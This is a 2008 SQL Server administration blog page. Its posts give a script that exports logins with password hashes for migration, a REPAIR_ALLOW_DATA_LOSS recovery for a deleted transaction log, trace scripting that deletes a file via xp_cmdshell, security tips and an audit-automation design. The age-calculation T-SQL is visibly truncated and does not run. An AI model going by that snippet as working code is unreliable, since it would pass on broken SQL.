Custom Search
body { background:#fff url("http://www.blogblog.com/harbor/rocks_left.jpg") no-repeat right bottom; background-attachment:fixed; margin:0; padding:0; font:x-small Georgia, Serif; color:#333333; font-size/* */:/**/small; font-size: /**/small; } /* Commented Backslash Hack hides rule from IE5-Mac \*/ body {background-attachment:scroll;} /* End IE5-Mac hack */ a:link { color:#336688; text-decoration:none; } a:visited { color:#764; text-decoration:none; } a:hover { color:#993333; text-decoration:underline; } a img { border-width:0; } /* Page Structure ----------------------------------------------- */ #wrap { background:url("http://www.blogblog.com/harbor/sky_left.jpg") repeat-x; min-width:740px; margin:0; padding:0; text-align:left; font: normal normal 100% Georgia,Serif; } #wrap2 { background:url("http://www.blogblog.com/harbor/lighthouse_left.jpg") no-repeat left 0px; } #wrap3 { background:url("http://www.blogblog.com/harbor/cloud_left.jpg") no-repeat right 75px; } #wrap4 { background:url("http://www.blogblog.com/harbor/center_cloud_left.jpg") no-repeat 50% 0px; padding:15px; width:100%; width/* */:/**/auto; width: /**/auto; } #outer-wrapper { max-width:890px; padding: 0 30px 50px; width:100%; width/* */:/**/auto; width: /**/auto; } html>body #outer-wrapper { border:3px double #fff; } #main-wrapper { width:64%; float:right; word-wrap: break-word; /* fix for long text breaking sidebar float in IE */ overflow: hidden; /* fix for long non-text content breaking IE sidebar float */ } #main { margin:0; padding:0; } #sidebar-wrapper { width:32%; float:left; word-wrap: break-word; /* fix for long text breaking sidebar float in IE */ overflow: hidden; /* fix for long non-text content breaking IE sidebar float */ } #sidebar { margin:0; padding-top: 170px; } /** Page structure tweaks for layout editor wireframe */ body#layout #outer-wrapper, body#layout #sidebar, body#layout #wrap4, body#layout #header { margin-top: 0; margin-bottom: 0; padding: 0; } body#layout #sidebar-wrapper { width: 180px; margin-left: 0; } body#layout #wrap4, body#layout #outer-wrapper { width: 650px; } /* Header ----------------------------------------------- */ #header { padding-top:15px; padding-right:0; padding-bottom:10px; padding-left:110px; position: relative; } .Header h1 { margin:0 0 .25em; color:#667788; font: normal normal 270% Georgia, Serif; } .Header h1 a { color:#667788; text-decoration:none; } .Header .description { margin:0; max-width:700px; line-height:1.8em; text-transform:uppercase; letter-spacing:.2em; color:#667788; font: normal normal 75% Georgia, Serif; } /* Headings ----------------------------------------------- */ h2 { margin:1.5em 0 .75em; line-height: 1.4em; font: normal normal 78% Georgia, Serif; text-transform:uppercase; letter-spacing:.2em; color:#993333; } /* Posts ----------------------------------------------- */ h2.date-header { margin:2em 0 .5em; color: #993333; font: normal normal 78% Georgia, Serif; } .post { margin:.5em 0 1.5em; } .post h3 { margin:.25em 0 0; padding:0 0 4px; font-size:140%; font-weight:normal; line-height:1.4em; } .post h3 a, .post h3 strong { background:url("http://www.blogblog.com/harbor/icon_lighthouse.gif") no-repeat left .15em; display:block; padding-left:20px; text-decoration:none; color:#336688; font-weight:normal; } .post h3 strong { background-image:url("http://www.blogblog.com/harbor/icon_lighthouse2.gif"); color:#000; } .post h3 a:hover { color:#993333; } .post-body { background:url("http://www.blogblog.com/harbor/divider.gif") no-repeat center top; padding-top:12px; margin:0 0 .75em; line-height:1.6em; } .post-body blockquote { line-height:1.3em; } .post-footer { color:#999; text-transform:uppercase; letter-spacing:.1em; font-size: 78%; line-height: 1.4em; } .comment-link { margin-left:.4em; } .post-footer .post-timestamp, .post-footer .post-author { color:#666; } .comment-link strong { font-size:130%; } .comment-link { margin-left:.4em; } .post img { padding:4px; border:1px solid #cde; } /* Comments ----------------------------------------------- */ #comments { background:url("http://www.blogblog.com/harbor/divider.gif") no-repeat center top; padding:15px 0 0; } #comments h4 { margin:1em 0; font-weight: bold; line-height: 1.6em; text-transform:uppercase; letter-spacing:.2em; color: #993333; font: bold 78% Georgia Serif; } #comments h4 strong { font-size:130%; } #comments-block { margin:1em 0 1.5em; line-height:1.4em; } #comments-block dt { margin:.5em 0; } #comments-block dd { margin:.25em 20px 0; } #comments-block dd.comment-timestamp { margin:-.25em 20px 1.5em; line-height: 1.4em; text-transform:uppercase; letter-spacing:.1em; } #comments-block dd p { margin:0 0 .75em; } .deleted-comment { font-style:italic; color:gray; } .feed-links { clear: both; line-height: 2.5em; } #blog-pager-newer-link { float: left; } #blog-pager-older-link { float: right; } #blog-pager { text-align: center; } .comment-footer { font: 78%/1.4em Georgia , Serif; } /* Sidebar Content ----------------------------------------------- */ .sidebar .widget, .main .widget { background:url("http://www.blogblog.com/harbor/divider.gif") no-repeat center bottom; margin:0 0 15px; padding:0 0 15px; } .main .Blog { background-image: none; } .sidebar ul { list-style:none; margin-left: 0; } .sidebar li { margin:0; padding-top:0; padding-right:0; padding-bottom:.25em; padding-left:15px; text-indent:-15px; line-height:1.5em; } .sidebar p { color:#666; line-height:1.5em; } /* Profile ----------------------------------------------- */ .profile-datablock { margin:.5em 0 .5em; } .profile-data { margin:0; font: normal normal 78% Georgia, Serif; font-weight: bold; line-height: 1.6em; text-transform:uppercase; letter-spacing:.1em; } .profile-img { float: left; margin-top: 0; margin-right: 5px; margin-bottom: 5px; margin-left: 0; padding: 4px; border: 1px solid #cde; } .profile-textblock { margin:.5em 0 .5em; } .profile-link { font:78%/1.4em Georgia,Serif; text-transform:uppercase; letter-spacing:.1em; } /* Footer ----------------------------------------------- */ #footer-wrapper { clear:both; padding-top:15px; padding-right:30px; padding-bottom:0; padding-left:50px; text-align: center; } #footer .widget { background:url("http://www.blogblog.com/harbor/divider.gif") no-repeat center top; margin:0; padding-top:15px; line-height: 1.6em; text-transform:uppercase; letter-spacing:.1em; } -->

Tuesday, November 18, 2008

Copying SQL server logins from one server to another server

On the old server, copy the following Capture_Logins.sql script to the local hard disk.
************************************************************************************************/
USE master
GO
IF OBJECT_ID ('sp_hexadecimal') IS NOT NULL
DROP PROCEDURE sp_hexadecimal
GO
CREATE PROCEDURE sp_hexadecimal
@binvalue varbinary(256),
@hexvalue varchar(256) OUTPUT
AS
DECLARE @charvalue varchar(256)
DECLARE @i int
DECLARE @length int
DECLARE @hexstring char(16)
SELECT @charvalue = '0x'
SELECT @i = 1
SELECT @length = DATALENGTH (@binvalue)
SELECT @hexstring = '0123456789ABCDEF'
WHILE (@i <= @length) BEGIN DECLARE @tempint int DECLARE @firstint int DECLARE @secondint int SELECT @tempint = CONVERT(int, SUBSTRING(@binvalue,@i,1)) SELECT @firstint = FLOOR(@tempint/16) SELECT @secondint = @tempint - (@firstint*16) SELECT @charvalue = @charvalue + SUBSTRING(@hexstring, @firstint+1, 1) + SUBSTRING(@hexstring, @secondint+1, 1) SELECT @i = @i + 1 END SELECT @hexvalue = @charvalue GO IF OBJECT_ID ('sp_help_revlogin') IS NOT NULL DROP PROCEDURE sp_help_revlogin GO CREATE PROCEDURE sp_help_revlogin @login_name sysname = NULL AS DECLARE @name sysname DECLARE @xstatus int DECLARE @binpwd varbinary (256) DECLARE @txtpwd sysname DECLARE @tmpstr varchar (256) DECLARE @SID_varbinary varbinary(85) DECLARE @SID_string varchar(256) IF (@login_name IS NULL) DECLARE login_curs CURSOR FOR SELECT sid, name, xstatus, password FROM master..sysxlogins WHERE srvid IS NULL AND name <> 'sa'
ELSE
DECLARE login_curs CURSOR FOR
SELECT sid, name, xstatus, password FROM master..sysxlogins
WHERE srvid IS NULL AND name = @login_name
OPEN login_curs
FETCH NEXT FROM login_curs INTO @SID_varbinary, @name, @xstatus, @binpwd
IF (@@fetch_status = -1)
BEGIN
PRINT 'No login(s) found.'
CLOSE login_curs
DEALLOCATE login_curs
RETURN -1
END
SET @tmpstr = '/* sp_help_revlogin script '
PRINT @tmpstr
SET @tmpstr = '** Generated '
+ CONVERT (varchar, GETDATE()) + ' on ' + @@SERVERNAME + ' */'
PRINT @tmpstr
PRINT ''
PRINT 'DECLARE @pwd sysname'
WHILE (@@fetch_status <> -1)
BEGIN
IF (@@fetch_status <> -2)
BEGIN
PRINT ''
SET @tmpstr = '-- Login: ' + @name
PRINT @tmpstr
IF (@xstatus & 4) = 4
BEGIN -- NT authenticated account/group
IF (@xstatus & 1) = 1
BEGIN -- NT login is denied access
SET @tmpstr = 'EXEC master..sp_denylogin ''' + @name + ''''
PRINT @tmpstr
END
ELSE BEGIN -- NT login has access
SET @tmpstr = 'EXEC master..sp_grantlogin ''' + @name + ''''
PRINT @tmpstr
END
END
ELSE BEGIN -- SQL Server authentication
IF (@binpwd IS NOT NULL)
BEGIN -- Non-null password
EXEC sp_hexadecimal @binpwd, @txtpwd OUT
IF (@xstatus & 2048) = 2048
SET @tmpstr = 'SET @pwd = CONVERT (varchar(256), ' + @txtpwd + ')'
ELSE
SET @tmpstr = 'SET @pwd = CONVERT (varbinary(256), ' + @txtpwd + ')'
PRINT @tmpstr
EXEC sp_hexadecimal @SID_varbinary,@SID_string OUT
SET @tmpstr = 'EXEC master..sp_addlogin ''' + @name + ''
+ ''', @pwd, @sid = ' + @SID_string + ', @encryptopt = '
END
ELSE BEGIN
-- Null password
EXEC sp_hexadecimal @SID_varbinary,@SID_string OUT
SET @tmpstr = 'EXEC master..sp_addlogin ''' + @name + ''
+ ''', NULL, @sid = ' + @SID_string + ', @encryptopt = '
END
IF (@xstatus & 2048) = 2048
-- login upgraded from 6.5
SET @tmpstr = @tmpstr + '''skip_encryption_old'''
ELSE
SET @tmpstr = @tmpstr + '''skip_encryption'''
PRINT @tmpstr
END
END
FETCH NEXT FROM login_curs INTO @SID_varbinary, @name, @xstatus, @binpwd
END
CLOSE login_curs
DEALLOCATE login_curs
RETURN 0
GO
IF OBJECT_ID ('seeMigrateSQLLogins') IS NOT NULL
DROP PROCEDURE seeMigrateSQLLogins
GO
create procedure seeMigrateSQLLogins @login_name sysname = NULL
as
declare
@name char(50),
@binpwd varbinary (256),
@txtpwd sysname,
@tmpstr varchar (256),
@SID_varbinary varbinary(85),
@SID_string varchar(256),
@Is_Policy bit,
@Is_Exp bit,
@type char(1),
@Pol char(3),
@Exp char(3)
set nocount on
create table #logins (
[name] nvarchar(128) NOT NULL,
[sid] varbinary(85) NOT NULL,
[type] char(1) NOT NULL,
[is_policy_checked] bit default 0,
[is_expiration_checked] bit default 0,
[password_hash] varbinary(256) )
insert #logins (name, sid, type)
select name, sid, type from sys.server_principals where
(type_desc = 'SQL_LOGIN' or type_desc = 'WINDOWS_LOGIN') and name <> 'sa' and name <> 'NT AUTHORITY\SYSTEM'
update a set a.is_policy_checked = b.is_policy_checked, a.is_expiration_checked = b.is_expiration_checked, a.password_hash = b.password_hash
from #logins a, sys.sql_Logins b
where a.sid = b.sid
set nocount off
IF (@login_name IS NULL) --Not a single user, get the list
DECLARE seelogin_curs CURSOR FOR
SELECT name, sid, password_hash, type, is_policy_checked, is_expiration_checked FROM #logins
WHERE name <> 'sa'
ELSE
DECLARE seelogin_curs CURSOR FOR
SELECT name, sid, password_hash, type, is_policy_checked, is_expiration_checked FROM #logins
WHERE name = @login_name
OPEN seelogin_curs
FETCH NEXT FROM seelogin_curs INTO @name, @SID_varbinary, @binpwd, @type, @Is_Policy, @Is_Exp
IF (@@fetch_status = -1)
BEGIN
PRINT 'No login(s) found.'
CLOSE seelogin_curs
DEALLOCATE seelogin_curs
END
SET @tmpstr = '/* seeMigrateSQLLogins - For SQL Server 2005 Only '
PRINT @tmpstr
SET @tmpstr = '** Generated '
+ CONVERT (varchar, GETDATE()) + ' on ' + @@SERVERNAME + ' */'
PRINT @tmpstr
PRINT ''
WHILE (@@fetch_status <> -1)
BEGIN
IF @type = 'S'
BEGIN
PRINT '/* SQL Login ******************/'
EXEC sp_hexadecimal @binpwd, @txtpwd OUT
EXEC sp_hexadecimal @SID_varbinary, @SID_string OUT
IF @Is_Policy = 1 Begin set @Pol = 'ON' End ELSE Begin set @Pol = 'OFF' END
IF @Is_Exp = 1 Begin set @Exp = 'ON' End ELSE Begin set @Exp = 'OFF' END
SET @tmpstr = 'Create Login [' + rtrim(@name) + '] WITH PASSWORD = ' + @txtpwd + ' hashed, sid = ' + @SID_string + ', CHECK_POLICY = ' + @Pol + ', CHECK_EXPIRATION = ' + @Exp
PRINT @tmpstr
PRINT ''
END
Else
BEGIN
PRINT '/* SQL Login ******************/'
EXEC sp_hexadecimal @SID_varbinary, @SID_string OUT
SET @tmpstr = 'Create Login [' + rtrim(@name) + '] FROM WINDOWS; '
PRINT @tmpstr
PRINT ''
END
FETCH NEXT FROM seelogin_curs INTO @name, @SID_varbinary, @binpwd, @type, @Is_Policy, @Is_Exp
END
CLOSE seelogin_curs
DEALLOCATE seelogin_curs
drop table #logins
GO

declare
@version2005 char(5)
declare
@version2008 char(5)

--Get the current version of SQL Server running
select @version2005 = substring(@@version,29,4)
select @version2008 = substring(@@version,35,4)

if @version2005 = '9.00'
Begin
exec seeMigrateSQLLogins
End
Else if @version2008 = '10.0'
Begin
exec seeMigrateSQLLogins
End
Else
begin
exec sp_help_revlogin
End

IF OBJECT_ID ('sp_hexadecimal') IS NOT NULL
DROP PROCEDURE sp_hexadecimal
GO
IF OBJECT_ID ('sp_help_revlogin') IS NOT NULL
DROP PROCEDURE sp_help_revlogin
GO
IF OBJECT_ID ('seeMigrateSQLLogins') IS NOT NULL
DROP PROCEDURE seeMigrateSQLLogins
GO
/* End Script */

On the old server, run the Capture_Logins.sql script to capture all SQL Server logins and password information. All SQL Server logins that are using the SQL Server installation on the old server will be captured. Follow these steps, based on the SQL Server that tools you use:
· If you use SQL Server Management Studio, follow these steps:
a. Click Start, point to All Programs, point to Microsoft SQL Server 2005, and then click SQL Server Management Studio.
b. In the Connect to Server window, follow these steps:
1. In the Server name box, type the name of the server that is running SQL Server.
2. In the Authentication box, click SQL Authentication.
3. In the Login box, type sa.
4. In the Password box, type the password for the sa user, and then click Connect.
c. Click File, point to Open, and then click File.
d. In the Look In list, click the Capture_Logins.sql script that you copied to the local hard disk in step 1, and then click Open.
e. In the Connect to Database Engine window, follow these steps: In the Server Name box, type the name of the old server that is running SQL Server.
1. In the Authentication box, click SQL Authentication.
2. In the Login box, type sa.
3. In the Password box, type the password for the sa user, and then click Connect.
4. f. Click Query, point to Results to, and then click Results to File.
f. Click Query, and then click Execute.
g. In the Save Results window, follow these steps:
1. In the Save in list, click the location where you want to save the results of the script.
2. In the File name box, type SQLLOGINS.sql, and then click Save.

· If you use Query Analyzer, follow these steps:
a. Click Start, point to All Programs, point to Microsoft SQL Server, and then click Query Analyzer.
b. In the Connect to SQL Server window, follow these steps:
1. In the SQL Server box, type the name of the old server that is running SQL Server.
2. In the Connect using area, click SQL Server Authentication.
3. In the Login name box, type sa.
4. In the Password box, type the password for the sa user, and then click OK.
c. Click File, and then click Open.
d. In the Open Query File window, in the Look In list, click the Capture_Logins.sql script that you copied to the local hard disk of the old server in step 1, and then click Open.
e. Click Query, and then click Results to File.
f. Click Query, and then click Execute.
g. In the Save Results window, follow these steps:
1. In the Save in list, click the location where you want to save the results of the script.
2. In the File name box, type SQLLOGINS.sql, and then click Save.

Monday, July 14, 2008

Repair a Database with a deleted Transaction log

You have your network team say "Hey, this client ran out of disk space so we deleted the transaction log for the database as it was over 100GB". Now the problem was that the applications started failing. I ran into a few hints in BOL and then other hints on the Internet. After all the research, I determined the best issue would be to use the DBCC CHECKDB with the REPAIR_ALLOW_DATA_LOSS option. BOL stated this option could repair a transaction log. Well what could be more broken about a transaction log than not having one at all?

Using the following method you can have the Log file recreated.
/*Stop SQL service,
rename DbLive.mdf to DbBad.mdf.
started SQL service, created fake DbLive db (with log etc)
Stopped SQL service
Deleted DbLIve.mdf
Renamed DbBad.MDF to DbLive.MDF
Started SQL service.
Run following script:*/
ALTER DATABASE DbLive SET EMERGENCY
sp_dboption 'DbLive', 'single user', 'true' DBCC CHECKDB ('DbLive', REPAIR_ALLOW_DATA_LOSS)sp_dboption 'DbLive', 'single user', 'false'

This should solve the issue.

Monday, June 30, 2008

Calculating the age of an individual

How do you calculate the age of an individual? This can become an extremely hot topic and the number of solutions provided can be numerous. Before attacking this “controversial” topic, it actually would help set some ground rules to be used in designing an aging algorithm.
The most difficult part of this, of course, is figuring out what to do with leap years. When does a person (or object or document for that matter) become another year older? For the purposes of this short article, I propose that this occurs on February 28th of non leap years.
Some Basic Date Arithmetic, SQL StyleBefore diving into the aging calculation, let’s look at some very simple date arithmetic using SQL Server 2005.


First, let’s see what adding 1 year to February 28, 2008 and February 29, 2008 returns.

declare @date1 datetime,
@date2 datetime
set @date1 = '20080228'
set @date2 = '20080229'
select dateadd(yy, 1, @date1), dateadd(yy, 1, @date2)
Result:
2009-02-28 00:00:00.000 2009-02-28 00:00:00.000


Interesting, adding 1 year to both dates results in the same date. Let’s see what happens when you now add 4 years.
declare @date1 datetime,

@date2 datetime
set @date1 = '20080228'
set @date2 = '20080229'
select dateadd(yy, 4, @date1), dateadd(yy, 4, @date2)
Result:
2012-02-28 00:00:00.000 2012-02-29 00:00:00.000


Now that is interesting, both dates aren’t the same. This is what would be expected.
Now, let’s look at DATEDIFF and see how it works a little.
declare @date1 datetime,

@date2 datetime
set @date1 = '20080229'
set @date2 = '20090228'
select datediff(yy, @date1, @date2)
Result: 1

But wait, what is the result of the following?
declare @date1 datetime,

@date2 datetime
set @date1 = '20081231'
set @date2 = '20090101'
select datediff(yy, @date1, @date2)
Result:1

Wait! That isn’t right, there isn’t a year between those two dates, something must be wrong. As you can see, the DATEDIFF function returned the number of year’s difference between the year values of the two dates, not the actual number of years between the two dates.
We can use this information to create a simple algorithm:
Age = datediff(yy, date_of_birth, Today)
– (if Today < dateadd(yy, datediff(yy, date_of_birth, Today),date_of_birth)
then 1 else 0
Or, to put it in to T-SQL:
declare @dob datetime,

@age int,
@day datetime
set @day = '2008-02-28'
set @dob = '2007-03-01'
set @age = datediff(yy,@dob,@day)–
case
when @day <>
then 1
else 0
end
select @age

Conclusion
This is just one method to use to calculate the age of person in code. There are numerous other methods that can also be used. All I can suggest, is use the method that works best for you in your situation.

Thursday, June 19, 2008

Scripting Trace's for SQL 2005

I wrote this with the assumption that you will be running traces around job steps, but you can adapt this for other situations.I used the default traces for both SQL and AS traces, but removed most of the Events from both the trace definitions in this write-up, just for brevity, you can generate the full definitions from Profiler by following the steps below. I have sections for SQL Server and Analysis Services.

SQL Trace

1. Create the Trace you want in SQL Profiler, on a SQL connection, setting a Trace Name (I used 'OLAP Error SQL Data'), Save To File with a file name and a file size large enough to hold the data in a single file (I used 32MB), and the Events / Data fields you want to trace. Run the Trace.

2. Stop the Trace - we don't actually want to collect anything at this point.

3. Export the trace definition - select "FileExportScript Trace DefintionFor SQL 2005...". Export the definition to a .SQL file of your choice.

4. Close Profiler, we're done with it at this point.In the SQL job with the step you want to trace, you're going to add a couple of steps before the step you want to trace...

5. Add the following code to a T-SQL job step, named 'Delete SQL Trace File', before the step you want to trace (this step is just to make sure there isn't a file from a previous run, just in case):
DECLARE @OS_Cmd VARCHAR(1024)SELECT @OS_Cmd = 'DEL /Q /F "C:\Trace Files\OLAP Error SQL Data.trc"'EXECUTE master.dbo.xp_cmdshell @OS_CmdNOTE - you will get an error code 12 from the sp_trace_create call in the next step if the output file already exists.


6. Add the code from the SQL file you just created to a T-SQL job step, named 'Start SQL Trace', immediately after the 'Delete SQL Trace File' step. Replace the literal 'InsertFileNameHere' with the destination you want for the trace file (don't add .trc to the end of the file name - it will automatically get added for you). It should look like this:

-- Create a Queue
declare @rc int
declare @TraceID int
declare @maxfilesize bigint
set @maxfilesize = 32-- Please replace the text InsertFileNameHere, with an appropriate
--filename prefixed by a path, e.g., c:\MyFolder\MyTrace. The .trc extension
--will be appended to the filename automatically. If you are writing from
-- remote server to local drive, please use UNC path and make sure server has
-- write access to your network share
exec @rc = sp_trace_create @TraceID output, 0, N'C:\Trace Files\OLAP Error SQL Data', @maxfilesize, NULL
if (@rc != 0) goto error
-- Client side File and Table cannot be scripted
-- Set the events
declare @on bit
set @on = 1
exec sp_trace_setevent @TraceID, 14, 1, @on
exec sp_trace_setevent @TraceID, 14, 9, @on
exec sp_trace_setevent @TraceID, 14, 6, @on
exec sp_trace_setevent @TraceID, 14, 10, @on
exec sp_trace_setevent @TraceID, 14, 14, @on
exec sp_trace_setevent @TraceID, 14, 11, @on
exec sp_trace_setevent @TraceID, 14, 12, @on
-- Set the Filters
declare @intfilter int
declare @bigintfilter bigint
exec sp_trace_setfilter @TraceID, 10, 0, 7, N'SQL Server Profiler - 1745445d-46a5-4050-9922-16caf3851690'
-- Set the trace status to start
exec sp_trace_setstatus @TraceID, 1
-- display trace id for future references
select
TraceID=@TraceID
goto finish
error: select
ErrorCode=@rc
finish:
Now you're going to add a couple of steps after the step you want to trace...

7. You need to stop the trace. Add this code to a T-SQL step named 'Stop SQL Trace', note that the file name in the WHERE clause must match the file name you specified above in the 'Start SQL Trace' step, with the '.trc. added to the end:
DECLARE @TraceID INT
SELECT @TraceID = TraceID FROM :: fn_trace_getinfo(0)WHERE CAST([value] AS VARCHAR(256)) = 'C:\Trace Files\OLAP Error SQL Data.trc'
IF @TraceID IS NOT NULL

BEGIN
PRINT 'Closing Trace ID ' + CAST (@TraceID AS VARCHAR(5))
EXEC sp_trace_setstatus @TraceID, 0

EXEC sp_trace_setstatus @TraceID, 2
END

10 Steps to Secure SQL server

1. KEEP SYSTEMS UP TO DATE ON SERVICE PACKS, PATCHES, AND NEW VERSIONS OF THE OS AND SQL SERVER.
Tools to help with this: Idera SQLsecure is a tool for assessing security across your SQL Servers. SQLsecure collects SQL Server version number and service pack as part of the overall security assessment it performs. The version number returned by SQLsecure will also reflect the latest patches applied, so you can determine which servers are out of date.

2. ENFORCE STANDARDS FOR SECURE PASSWORDS.
Tools to help with this: If you are using SQL Server 2005, use the built-in security options to enforce password complexity standards. For previous versions of SQL Server, there are many publicly available scripts you can use to identify accounts with weak or non-existent passwords.

3. SECURE THE FULL ENVIRONMENT, INCLUDING THE OS AND NETWORK
Tools to help with this: Microsoft has many documents and knowledge base articles that provide more detail and best practices on how to ensure server and application security.

4. ENSURE APPROPRIATE SQL SERVER SETUP
Tools to help with this: Idera SQLsecure checks most of these settings across your SQL Servers and reports back where you have potential security concerns.

5. REGULARLY ASSESS WHO CAN ACCESS YOUR SQL SERVERS AND TAKE ACTION TO LIMIT ACCESS.
Tools to help with this: Idera SQLsecure can make this task a whole lot easier for you. SQLsecure automatically generates a complete list of all users with access to your SQL Server, across Windows, Active Directory, and SQL Server, including users that have access as a result of group membership.

6. ASSESS WHAT ACTIONS USERS CAN PERFORM ON WHAT OBJECTS
Tools to help with this: Accurately assessing effective permissions on SQL Server objects is really, really, hard to do manually. Idera SQLsecure can perform this time consuming task for you. SQLsecure calculates both effective (derived) and assigned permissions for all users, on any database object, making it much easier to ensure that users have appropriate access rights.

7. KEEP AN AUDIT TRAIL OF DATABASE ACTIVITY.
Tools to help with this: SQL Server does provide native C2 auditing to help with gathering this information. However, C2 auditing can be very resource intensive and does not provide fine-grained controls to let you specify what you want to collect. You may instead want to use a 3rd party auditing tool, such as Idera SQL compliance manager. SQL compliance manager provides customizable, low-impact auditing, alerting and reporting on virtually all activity across multiple SQL servers.

8. AUDIT THE ACTIONS OF ADMIN USERS ON YOUR SQL SERVERS
Tools to help with this: The native SQL Server C2 auditing can also be used for this purpose, however, there is no way to ensure an immutable trail of audit data with the native tools. So, what’s to stop an admin user from deleting the audit trail after making off with your customer list? A better solution is to invest in a 3rd party tool such as SQL compliance manager which can audit ALL admin user activity, and protect the audit trail from tampering by anyone, even admin users.

9. SECURE AND AUDIT THE APPLICATIONS THAT ACCESS YOUR SQL SERVER DATABASES
Tools to help with this: Idera SQL compliance manager will track the activity of any application within a targeted database. And, alerts can be configured to watch for and provide immediate notification of questionable behavior, such as a business application accessing a database it shouldn’t.

10. ENSURE PROPER DATABASE BACKUPS, AND SECURE YOUR BACKUPS
Tools to help with this: While SQL Server does give you the ability to backup your databases, it does not include the ability to encrypt the backups, or compress them to help save space and reduce backup time. Idera SQLsafe provides a high performance backup solution which includes encryption and compression. SQLsafe also lets you create backup policies with exception reporting to notify you of any backups that failed to run as scheduled.

Wednesday, June 18, 2008

Automate Audit Requests

Periodically an internal auditor would stop by my desk and ask me to show them all the users and permissions on a particular database. This is easily gathered, and most of us know how to do this. I produce this list, and send it on to the requestor. The next question is ‘What has changed?’. I do not have this information, and have to tell them I do not know. So, after a couple iterations of this (I will not admit how many) I finally devised a simple way to store this information to adequately respond to this question. A snapshot of the user information is gathered from time to time, and stored into a history table. The next time a request comes in I can compare the current values to the historical ones. This would become tedious as it usually involved some spreadsheets or query results, and manually reviewing the data, looking for new records, changed records and so on. When I would produce these two sets of data (current and 1 historical snapshot) and give the data back to the auditor, they were initially happy, until they realized all the time that would be involved to perform an adequate review of the two sets of data. The next question would invariably be, is there a way to automate this? There is always a way to automate anything, I would respond, and skulk back to my DBA hole and pound out some more code. After more review of the results I produced and even more back and forth between me and the auditor, we finally decided which fields we needed to see, the differences we should show, etc. I will now try to explain the system that we devised to assist us in this simple, yet complex endeavor. System We basically want to know what the users looked like at a point in time. Compare it to the current state of the users, and show differences. Differences will be defined as: new records, changed records, removed records and old records. We want to be able to dynamically include any number of new and existing servers into this system, though we started with a single server. We want to be able to display these results for a period of time, and allow reporting to occur based on the results. Since we already have a monitoring server setup, this was the perfect place to locate this system. We already use linked servers to connect too and monitor all our remote servers, so we will continue in this vein for this system. Justifications can be read in other articles I’ve written about monitoring with linked servers. A configuration table needs to indicate which servers we will be monitoring. Some stored procedures will need to use dynamic sql, cycle thru the config list of servers, and call them to gather data, stage the data, and then do comparisons against this data. Then resulting data can be reported on. That’s the high level description. I will now go through all the objects, with more detail. Tables DatabaseRolesConfig This table will contain a ServerName and an Enabled flag. This allows us to setup multiple servers to be monitored, and enable and disable them at whim. The fields for this table are as follows: ServerName sysname not null, Enabled bit not null default 0 DatabaseRolesStaging This table will allow us to store data we have pulled down from all the remote servers. Once staged, we can query it and process it to our desires. The fields in this table are as follows:
Type sysname null default '',
ServerName sysname null default '',
DBName sysname null default '',
LoginName sysname null default '',
UserName sysname null default '',
db_owner varchar(3) null default '',
db_accessadmin varchar(3) null default '',
db_securityadmin varchar(3) null default '',
db_ddladmin varchar(3) null default '',
db_datareader varchar(3) null default '',
db_datawriter varchar(3) null default '',
db_denydatareader varchar(3) null default '',
db_denydatawriter varchar(3) null default '',
denylogin int null default '',
hasaccess int null default '',
isntname int null default '',
isntgroup int null default '',
isntuser int null default '',
sysadmin int null default '',
securityadmin int null default '',
serveradmin int null default '',
setupadmin int null default '',
processadmin int null default '',
diskadmin int null default '',
dbcreator int null default '',
bulkadmin int null default '' All the fields accept a default of blank, for reporting purposes. Not all fields for every row will have a value. This eliminates the display of null values in the report. This is just a simple step I chose to make life easy

DatabaseRolesHistory
This table is identical to the staging table, and will hold the processed data from the last execution for comparison to the next execution.
DatabaseRolesArchive
This table is identical to the staging table, except that it has an added Identity field for uniqueness, and a [Date] field that will contain the date of the archived data. This will be a holding area for all the data processes and displayed from past executinos. The extra fields are as follows:

ID integer not NULL IDENTITY(1,1),
[Date] datetime not null default getdate(),

DatabaseRolesDisplay
This table is similar to the above two tables. We’ve added an Identity field for uniqueness. A Version field to keep track of the previous version (Type). This will be the table that contains the processed data, grouped by type, and cleaned up. We will report from this table, as it will have the result set of data after processing. The fields of this table are as follows:

ID integer not NULL IDENTITY(1,1),
Version VARCHAR(8) not null,

Stored Procedures
sp_GetDBRoles
This procedure be passed a ServerName, DatabaseName and a UserName. The last two params were never implemented. But the ServerName determines which server we will be pulling data from. We use dynamic sql to pull information from the syslogins from the remote server, and then store it in the DatabaseRolesStaging table, with a ServerName and Type included. Then we create a cursor that will cycle thru each database in sysdatabases, except a few. Inside the cursor, we will dynamically call sql that pulls more data from sysmembers, sysusers and syslogins, retrieving those users that have roles set. This data is also stored in the staging table also. We will next use dynamic sql to pull more data from sysusers and syslogins, retrieving those users that do not have roles set. This data is also stored in the staging table.

sp_GetAllDBRoles
This will cycle thru the config table DatabaseRolesConfig and call the sp_GetDBRoles proc for each server that is enabled to be processed. sp_ProduceDatabaseRolesResults
Since we have previously gathered records into the DatabaseRolesStaging table, we can now compare these results to some other tables of historical data. We have a history table called DatabaseRolesHistory that contains the last set of data we gathered about Users.

1. We select the new values, and insert them into a memory table @DatabaseRolesStaging with a flag indicating they are ‘new’.
2. We select the old values that have changed, and insert them into the table @DatabaseRolesStaging with a flag indicating they are ‘old’.
3. We update the ‘new’ values that have changed. We determine this if there is a new record, and an old with some of the same values (Servername, DBName, UserName and LoginName). These are updated in the table @DatabaseRolesStaging with a flag indicating they are ‘changed’.
4. We find the records that were removed from the DatabaseRolesHistory table, compared to the DatabaseRolesStaging table. These records are inserted into the table @DatabaseRolesStaging with a flag indicating they are ‘removed’.
5. Records that were simply altered are removed from the memory table @DatabaseRolesStaging.
This resulting data is now labled and ready to display to the requestor. We process the data from the @DatabaseRolesStaging table, and order it with ‘Old’ and ‘Changed’ being first, then the ‘Removed’ records, followed by the ‘New’ records. This just helps in the viewing of the data, with the important ones being first, and so on. This resulting data is dumped into a real table called DatabaseRolesDisplay, and will live there until the next execution of this process. This allows me to reselect from this data when needed between executions. I used to have this simply returned once as part of the proc call, but would tend to need to look at the data subsequently; this solves that need.
sp_ProcessDatabaseRoles
